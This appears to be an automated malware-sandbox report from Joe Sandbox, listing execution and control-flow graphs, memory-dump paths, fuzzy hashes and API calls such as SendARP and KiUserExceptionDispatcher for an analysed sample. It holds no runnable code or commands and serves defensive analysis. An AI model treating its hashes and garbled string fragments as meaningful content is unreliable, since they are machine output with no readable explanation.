                                                                                                                                                                                                                                  execution_graph 29276 5110b20 29277 5110b42 LdrInitializeThunk 29276->29277 29279 5110b7c 29277->29279 29280 5115320 29281 5115366 KiUserCallbackDispatcher 29280->29281 29283 51153b9 29281->29283 29176 22f33e8 29177 22f3433 SendARP 29176->29177 29179 22f3481 29177->29179 29180 860888 29181 8608a3 29180->29181 29185 867588 29181->29185 29199 8675e6 29181->29199 29182 860902 29186 8675b7 29185->29186 29187 867602 29186->29187 29213 867ee6 29186->29213 29218 867e38 29186->29218 29223 867ebf 29186->29223 29228 867f70 29186->29228 29233 867f53 29186->29233 29238 867e29 29186->29238 29243 867e68 29186->29243 29248 867f20 29186->29248 29253 867f03 29186->29253 29258 867ea2 29186->29258 29263 867e85 29186->29263 29187->29182 29200 8675f1 29199->29200 29201 867ee6 2 API calls 29200->29201 29202 867e85 2 API calls 29200->29202 29203 867ea2 2 API calls 29200->29203 29204 867f03 2 API calls 29200->29204 29205 867f20 2 API calls 29200->29205 29206 867e68 2 API calls 29200->29206 29207 867e29 2 API calls 29200->29207 29208 867f53 2 API calls 29200->29208 29209 867f70 2 API calls 29200->29209 29210 867ebf 2 API calls 29200->29210 29211 867602 29200->29211 29212 867e38 2 API calls 29200->29212 29201->29211 29202->29211 29203->29211 29204->29211 29205->29211 29206->29211 29207->29211 29208->29211 29209->29211 29210->29211 29211->29182 29212->29211 29214 867eeb 29213->29214 29215 867f8b 29214->29215 29268 5110a6a 29214->29268 29272 5110a7c 29214->29272 29215->29187 29219 867e5e 29218->29219 29220 867f8b 29219->29220 29221 5110a6a KiUserExceptionDispatcher 29219->29221 29222 5110a7c KiUserExceptionDispatcher 29219->29222 29220->29187 29221->29220 29222->29220 29224 867ec4 29223->29224 29225 867f8b 29224->29225 29226 5110a6a KiUserExceptionDispatcher 29224->29226 29227 5110a7c KiUserExceptionDispatcher 29224->29227 29225->29187 29226->29225 29227->29225 29229 867f75 29228->29229 29230 867f8b 29229->29230 29231 5110a6a KiUserExceptionDispatcher 29229->29231 29232 5110a7c KiUserExceptionDispatcher 29229->29232 29230->29187 29231->29230 29232->29230 29234 867f58 29233->29234 29235 867f8b 29234->29235 29236 5110a6a KiUserExceptionDispatcher 29234->29236 29237 5110a7c KiUserExceptionDispatcher 29234->29237 29235->29187 29236->29235 29237->29235 29239 867e5e 29238->29239 29240 867f8b 29239->29240 29241 5110a6a KiUserExceptionDispatcher 29239->29241 29242 5110a7c KiUserExceptionDispatcher 29239->29242 29240->29187 29241->29240 29242->29240 29244 867e6d 29243->29244 29245 867f8b 29244->29245 29246 5110a6a KiUserExceptionDispatcher 29244->29246 29247 5110a7c KiUserExceptionDispatcher 29244->29247 29245->29187 29246->29245 29247->29245 29249 867f25 29248->29249 29250 5110a6a KiUserExceptionDispatcher 29249->29250 29251 5110a7c KiUserExceptionDispatcher 29249->29251 29252 867f8b 29249->29252 29250->29252 29251->29252 29252->29187 29254 867f08 29253->29254 29255 867f8b 29254->29255 29256 5110a6a KiUserExceptionDispatcher 29254->29256 29257 5110a7c KiUserExceptionDispatcher 29254->29257 29255->29187 29256->29255 29257->29255 29259 867ea7 29258->29259 29260 867f8b 29259->29260 29261 5110a6a KiUserExceptionDispatcher 29259->29261 29262 5110a7c KiUserExceptionDispatcher 29259->29262 29260->29187 29261->29260 29262->29260 29264 867e8a 29263->29264 29265 867f8b 29264->29265 29266 5110a6a KiUserExceptionDispatcher 29264->29266 29267 5110a7c KiUserExceptionDispatcher 29264->29267 29265->29187 29266->29265 29267->29265 29269 5110a7d 29268->29269 29270 5110a82 KiUserExceptionDispatcher 29269->29270 29271 5110a95 29269->29271 29270->29269 29271->29215 29273 5110a7d 29272->29273 29274 5110a82 KiUserExceptionDispatcher 29273->29274 29275 5110a95 29273->29275 29274->29273 29275->29215
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5110000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 6600096910ce003e6e60717324e8a2b77260c89a7aa38445d0c6d92a64823f90
                                                                                                                                                                                                                                  • Instruction ID: 2e90a327bc4644e25a24d60db52ea68201dddb365191f1d1a9bbdc10ace4d60a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6600096910ce003e6e60717324e8a2b77260c89a7aa38445d0c6d92a64823f90
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26216D34B006158BC714EB68C5987AE77F2EB8C346F2044B9D406EB394DB759C42CB99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: \Vnl
                                                                                                                                                                                                                                  • API String ID: 0-2010404446
                                                                                                                                                                                                                                  • Opcode ID: 02d385d260cd8803a465d0c7c75579b6877fc11fc1ece671a4a54565d3917ed6
                                                                                                                                                                                                                                  • Instruction ID: b978f4d9165b0ebd4df2aff0aeea71191f9c0495394a788b7e6d03350c660216
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02d385d260cd8803a465d0c7c75579b6877fc11fc1ece671a4a54565d3917ed6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29B14A70E006098FDF14CFA9D8957AEBBF2FF88714F258129D815E7294EB749845CB81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 569d9090a579f42e65f77164bf8af5a768367e3f4ab506007a2af715eafc8c35
                                                                                                                                                                                                                                  • Instruction ID: 5d4974b5a05ff176081792e63fce744544fd39de568ab0f81f9a4e756a6a0816
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 569d9090a579f42e65f77164bf8af5a768367e3f4ab506007a2af715eafc8c35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AB16A70E002498FDF10CFA9D9867AEBBF2FF88314F158129D815EB294EB749855CB85

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 861750-86177f 2 861785-8617f7 call 860af8 0->2 3 861a2a-861a8b 0->3 34 8617fd-861874 2->34 15 861ab6-861abf 3->15 16 861ac1-861ac7 15->16 17 861a8d-861a96 15->17 18 861aca-861adc 17->18 19 861a98-861aa6 17->19 26 861ade-861b14 call 860b34 18->26 27 861b5c 18->27 19->18 21 861aa8-861aac 19->21 22 861ab3 21->22 23 861aae-861ab0 21->23 22->15 23->22 29 861b18-861b26 26->29 28 861b5e-861baf call 861bd0 27->28 27->29 57 861bb5-861bcd 28->57 38 861b2c-861b54 29->38 60 861876-861889 34->60 61 86188b-8618af 34->61 38->27 62 8618b6-8618ba 60->62 61->62 64 8618c5 62->64 65 8618bc 62->65 64->3 65->64
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (bq$D@|$D@|$Te^q$d7p
                                                                                                                                                                                                                                  • API String ID: 0-521794745
                                                                                                                                                                                                                                  • Opcode ID: 4707548c42c8a19bfc1b2630259311ac5f744ca19549c0959867b130a1479c48
                                                                                                                                                                                                                                  • Instruction ID: a6b9edfed54f56215dbc204a588489af0a328857af8bce77fbb8e07edc3ffd7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4707548c42c8a19bfc1b2630259311ac5f744ca19549c0959867b130a1479c48
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE515C34B101149FCB44DF69C458B5EBBE6FF88700F2581A9E406EB3A6DA75ED018B81

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 433 8615b8-8615d8 434 8615e6 433->434 435 8615da-8615e4 433->435 436 8615eb-8615ed 434->436 435->436 437 8615f3-861626 436->437 438 8616d8-861734 call 861750 436->438 445 861629-86163c 437->445 456 86173a-86174a 438->456 450 86163d-861647 445->450 451 861648-861657 445->451 450->451 451->445 455 861659-86168f 451->455 461 861695-8616b9 455->461 464 8616c4-8616c5 461->464 465 8616bb 461->465 464->438 465->464
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: D@|$Hbq$dLdq
                                                                                                                                                                                                                                  • API String ID: 0-2660850697
                                                                                                                                                                                                                                  • Opcode ID: 7c9c47d6593ebf512b9f24e2303026a0a4850f4ac73406426267fa0c5ae6cf3c
                                                                                                                                                                                                                                  • Instruction ID: 192de80e42579805599b10fc7a839f85feb1af08cd1b2e49988c56bfb99ec3df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c9c47d6593ebf512b9f24e2303026a0a4850f4ac73406426267fa0c5ae6cf3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7641A134B042449FCB05DF69D458B9EBBF2FF89300F1985A9E006EB3A2CA749C05CB91

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 468 5115311-5115374 471 511537f-51153b7 KiUserCallbackDispatcher 468->471 472 51153c0-51153e6 471->472 473 51153b9-51153bf 471->473 473->472
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000050), ref: 051153A3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5110000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                                                                  • API String ID: 2492992576-1614139903
                                                                                                                                                                                                                                  • Opcode ID: 51e01c51932ec4a8ffa952d6fa35ae396e9c43c043fa87a0eb8943ba4e3bf83e
                                                                                                                                                                                                                                  • Instruction ID: 43d4db446f79015b538a6d64557463d51e7fb5d92aa4b70a96d0d98dccffb18c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51e01c51932ec4a8ffa952d6fa35ae396e9c43c043fa87a0eb8943ba4e3bf83e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC2178B1C04259CFCB10DFA9E944AEEBBB0FB48310F20805AD459B7291C7786945CFA5

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 476 5115320-51153b7 KiUserCallbackDispatcher 480 51153c0-51153e6 476->480 481 51153b9-51153bf 476->481 481->480
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000050), ref: 051153A3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5110000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                                                                  • API String ID: 2492992576-1614139903
                                                                                                                                                                                                                                  • Opcode ID: 7c37dd8ccf24fb5618eb657bd52f6a7c33a6c3e16b4e8aa306f163a509964964
                                                                                                                                                                                                                                  • Instruction ID: 90123a0c76072cf820a7973b0fccf260a187ab5143cde0824de1e1a764af16dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c37dd8ccf24fb5618eb657bd52f6a7c33a6c3e16b4e8aa306f163a509964964
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA2137B1D042598FCB10DF99E544AEEBBF4FB48320F10845AD819B7240C7796944CFA5

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 738 866da0-866db6 739 866ef4-866f19 738->739 740 866dbc-866dbe 738->740 742 866f20-866f6b 739->742 741 866dc4-866dd2 740->741 740->742 747 866dd4-866ddc 741->747 748 866e05-866e13 741->748 763 866fcd-866fd2 742->763 764 866f6d-866f76 742->764 750 866dde-866de0 747->750 751 866dea-866e02 747->751 755 866e15-866e1d 748->755 756 866e5a-866e68 748->756 750->751 758 866e1f-866e21 755->758 759 866e2b-866e57 755->759 765 866eaf-866eb7 756->765 766 866e6a-866e72 756->766 758->759 768 866fc3-866fc7 764->768 769 866f78-866f7b 764->769 770 866ec5-866ef1 765->770 771 866eb9-866ebb 765->771 772 866e74-866e76 766->772 773 866e80-866eac 766->773 768->763 775 866fd3-86701d 769->775 776 866f7d-866f8a 769->776 771->770 772->773 777 866f8c-866f98 776->777 778 866f9a-866fa2 776->778 777->778 789 866fb8-866fc1 777->789 785 866fa7-866fb7 778->785 789->768 789->769
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (bq$(bq
                                                                                                                                                                                                                                  • API String ID: 0-4224401849
                                                                                                                                                                                                                                  • Opcode ID: 98a0540808b2a018672cf0b84df10a4a4822ab57b522af6bc5ee61dbdf0b7ade
                                                                                                                                                                                                                                  • Instruction ID: 021aa38d2d6e06115de472591049f77b7a183926d07da7e8d56e9b040310f557
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98a0540808b2a018672cf0b84df10a4a4822ab57b522af6bc5ee61dbdf0b7ade
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D71D2317042408FC719DF6DE89091EBBE6EFC531071585BAE809CB39AEE35EC458790
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: \Vnl$\Vnl
                                                                                                                                                                                                                                  • API String ID: 0-659072146
                                                                                                                                                                                                                                  • Opcode ID: 0bd97b1f97dbd16d04f80b9052d1599688b43b91b45f3a3f7def590166973767
                                                                                                                                                                                                                                  • Instruction ID: cbcef874f01651de92d18093bc637cd36ec83f9e4e40bc704d484c99c61e0c99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bd97b1f97dbd16d04f80b9052d1599688b43b91b45f3a3f7def590166973767
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E7139B0E002898FDB10CFA9D95179EBBF2FF88314F158129E415E7354EB749856CB91
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: \Vnl$\Vnl
                                                                                                                                                                                                                                  • API String ID: 0-659072146
                                                                                                                                                                                                                                  • Opcode ID: 743cd9edf39f6b9be29f179267bd8deb29388d4ac4980087fe707d13eb7dd4f2
                                                                                                                                                                                                                                  • Instruction ID: b31694e9cfc986b7cdbb42bd7bdb81787216024139529290cec9643842911987
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 743cd9edf39f6b9be29f179267bd8deb29388d4ac4980087fe707d13eb7dd4f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B7149B0E002498FDB14CFA9C99179EBBF2FF88314F158129E415E7354EB749856CB81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Te^q$dLdq
                                                                                                                                                                                                                                  • API String ID: 0-1027511480
                                                                                                                                                                                                                                  • Opcode ID: 4349fe8e1e88db9878b5333add2248964bf968a6569384b104df450ef4060cf8
                                                                                                                                                                                                                                  • Instruction ID: c6f73ea3e93dcae251e4095b93282f403f203b5867676122b6807400c0b11dd6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4349fe8e1e88db9878b5333add2248964bf968a6569384b104df450ef4060cf8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E512574B102149FCB44DF69C898A5DBBF6FF89714B2540AAE506DB3B1DA71EC01CB80
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: D@|$Hbq
                                                                                                                                                                                                                                  • API String ID: 0-3684038388
                                                                                                                                                                                                                                  • Opcode ID: 3b14001cad56cf45fc71c15057c85f7685173c04a1ac92496a7c3ac24c3e6cba
                                                                                                                                                                                                                                  • Instruction ID: ad73f600a46a22868c722e8cef465c3872dfcd28899255d6762a4d4eca338959
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b14001cad56cf45fc71c15057c85f7685173c04a1ac92496a7c3ac24c3e6cba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0C82170C1805FC34A973D541466E6FE2AFC625072945FED149CB357CE288C06C796
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ~|
                                                                                                                                                                                                                                  • API String ID: 0-205454835
                                                                                                                                                                                                                                  • Opcode ID: f7495302a4270b4a363e9f7a50923afec50970d550c8b3ced677271588a1e507
                                                                                                                                                                                                                                  • Instruction ID: e90e021715070d6ba073e108c834960d07416943b85992bacf11d1f510d6f4d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7495302a4270b4a363e9f7a50923afec50970d550c8b3ced677271588a1e507
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC72DC70900218CFDB98DBA4CD94BDE7BB6BF88300F1084A9D14AAB3A5DE345E85DF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ~|
                                                                                                                                                                                                                                  • API String ID: 0-205454835
                                                                                                                                                                                                                                  • Opcode ID: 588f5780bd1a7c2f9ac33b604d7262d7d632a014a7e78b4a411d3cace773dbec
                                                                                                                                                                                                                                  • Instruction ID: 2830a8ecfaa989fb65ed23ee209b3cfe967372e7e1c9a2fc33d02376e9c02843
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 588f5780bd1a7c2f9ac33b604d7262d7d632a014a7e78b4a411d3cace773dbec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D72DC70900218CFDB98DBA4CD94BDE7BB6BF88300F1084A9D14AAB3A5DE355E85DF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: fcq
                                                                                                                                                                                                                                  • API String ID: 0-2768158334
                                                                                                                                                                                                                                  • Opcode ID: 14b8a3cb022497d45c25f422c1528f0c8cbd1778053972e8edb99dbb67707903
                                                                                                                                                                                                                                  • Instruction ID: 15ad05b1125ba8dd68cee93f6167ec8a53d9e7dfc219ef696ffd615d068e82dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b8a3cb022497d45c25f422c1528f0c8cbd1778053972e8edb99dbb67707903
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9352E034A40709DFDB06EBA4D554BAE7FB7FB88300F108814E805377A8CB76A895DB65
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                  • Opcode ID: 2297d739b5e48af7ac64e4c864320f9f7437f15d3e3132be341950b3cdcfc778
                                                                                                                                                                                                                                  • Instruction ID: 75ccfca30a8e1feae27fb49bf69e66a5e2e422b818d2acb44c7fdba6287a6b2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2297d739b5e48af7ac64e4c864320f9f7437f15d3e3132be341950b3cdcfc778
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14322771A00609DFCB14CF69C985BADFBB2FF98304F258629E459DB615D730E895CB80
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3218817089.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5110000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: bfe168a550996b4f9666c73fb97e817aa343363b8ec7a5c720c498f77bd2d385
                                                                                                                                                                                                                                  • Instruction ID: 55f174842d8f919703935eca2568ee464f0f9529f8ce38dc8f5dad416517920d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe168a550996b4f9666c73fb97e817aa343363b8ec7a5c720c498f77bd2d385
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC215B34B006158FCB14EB68C5986AE77F2AB8C346F2044B9D406EB395DB758C42CB99
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendARP.IPHLPAPI(?,?,00000000,?), ref: 022F3472
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3149862726.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_22f0000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 121738739-0
                                                                                                                                                                                                                                  • Opcode ID: 21ec48768aa8b97b578c61451913d14b5c0e65d782b7a8da16fb6afc5015a0fb
                                                                                                                                                                                                                                  • Instruction ID: 90f35fc3570d7dc7f39abc7a986b63ebb0d25eb49c31544709edd5d7ea10deb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ec48768aa8b97b578c61451913d14b5c0e65d782b7a8da16fb6afc5015a0fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4221EFB59002489FCB10CF9AD884BDEFBF4FB48320F10802AE958A7250D374A944CFA4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendARP.IPHLPAPI(?,?,00000000,?), ref: 022F3472
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3149862726.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_22f0000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 121738739-0
                                                                                                                                                                                                                                  • Opcode ID: 686958cd74643ce642cf73c4f10459351112fce3973203a7300fe0f4e2b715d5
                                                                                                                                                                                                                                  • Instruction ID: cfb46e4a64c6d66ccbbc65375dd8921b85a641dc55658f19e5ee191516e83aa6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 686958cd74643ce642cf73c4f10459351112fce3973203a7300fe0f4e2b715d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5221EFB59002489FCB10CF9AD884BDEFBF4FB48320F10802AE958A7250D374A944CFA4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: \Vnl
